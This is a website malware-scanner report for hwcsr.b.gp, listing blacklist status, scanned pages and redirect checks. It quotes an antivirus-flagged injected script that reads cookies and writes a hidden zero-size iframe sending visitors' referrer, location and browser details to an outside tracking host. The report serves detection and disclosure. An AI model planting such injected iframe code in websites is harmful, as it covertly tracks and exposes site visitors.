Malware Scanner report for hwcsr.b.gp

Malicious/Suspicious/Total urls checked: 1/0/15

1 page has malicious code. See details below

Blacklists: Found

The website is marked by Yandex as SMS-fraud resource.

The website "hwcsr.b.gp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/1/2

1 suspicious iframe found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hwcsr.b.gp

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://hwcsr.b.gp/

Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://hwcsr.b.gp/	200 OK Content-Length: 16467 Content-Type: text/html	clean
http://js.29fff.com/head.js	200 OK Content-Length: 1860 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >"); document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=2500 width=100%></iframe>"); document.writeln("<\/div>"); function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} ... 978 bytes are skipped ...r yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count29.51yes.com/sa.htm?id=297623349'+yesdata+' height=0 width=0></iframe>'); Antivirus reports: NANO-Antivirus Trojan.Url.IframeB.rsbhf Hidden iFrame found. size: 0x0 src: http://count29.51yes.com/sa.htm?id=297623349 <iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count29.51yes.com/sa.htm?id=297623349'+yesdata+' height=0 width=0>
http://hwcsr.b.gp/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9%E6%85%88%E5%96%84%E7%BD%91	200 OK Content-Length: 13845 Content-Type: text/html	clean
http://hwcsr.b.gp/a-439-2.html	200 OK Content-Length: 16227 Content-Type: text/html	clean
http://hwcsr.b.gp/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9%E7%BD%91%E5%9D%80%E6%80%BB%E6%B1%87	200 OK Content-Length: 14152 Content-Type: text/html	clean
http://hwcsr.b.gp/a-569-1.html	200 OK Content-Length: 16738 Content-Type: text/html	clean
http://hwcsr.b.gp/post/?tag=%E8%A7%A3%E4%B8%AD%E5%9B%BD%E7%A6%8F%E5%88%A9%E5%BD%A9%E7%A5%A8%E5%8F%8C%E8%89%B2%E7%90%83	200 OK Content-Length: 14753 Content-Type: text/html	clean
http://hwcsr.b.gp/a-1751-1.html	200 OK Content-Length: 2780 Content-Type: text/html	clean
http://hwcsr.b.gp/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9%E5%86%85%E9%83%A8%E7%8E%84%E6%9C%BA125	200 OK Content-Length: 14183 Content-Type: text/html	clean
http://hwcsr.b.gp/a-923-1.html	200 OK Content-Length: 16869 Content-Type: text/html	clean
http://hwcsr.b.gp/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9097%E6%9C%9F%E4%B8%A4%E8%82%96%E4%B8%AD%E7%89%B9%3A%E8%99%8E-%E7%8C%AA	200 OK Content-Length: 13555 Content-Type: text/html	clean
http://hwcsr.b.gp/a-915-2.html	200 OK Content-Length: 15945 Content-Type: text/html	clean
http://hwcsr.b.gp/post/?tag=%E7%A6%8F%E5%BD%A93d%E5%BC%80%E5%A5%96%E8%AE%B0%E5%BD%95	200 OK Content-Length: 14055 Content-Type: text/html	clean
http://hwcsr.b.gp/a-669-2.html	200 OK Content-Length: 15346 Content-Type: text/html	clean
http://hwcsr.b.gp/post/?tag=116%E6%9C%9F%E5%B9%B3%E7%A0%81%E4%B8%89%E4%B8%AD%E4%B8%89	200 OK Content-Length: 2021 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hwcsr.b.gp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Aug 2014 16:56:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.14

Second query (visit from search engine):
GET / HTTP/1.1
Host: hwcsr.b.gp
Referer: http://www.google.com/search?q=hwcsr.b.gp

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for hwcsr.b.gp

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools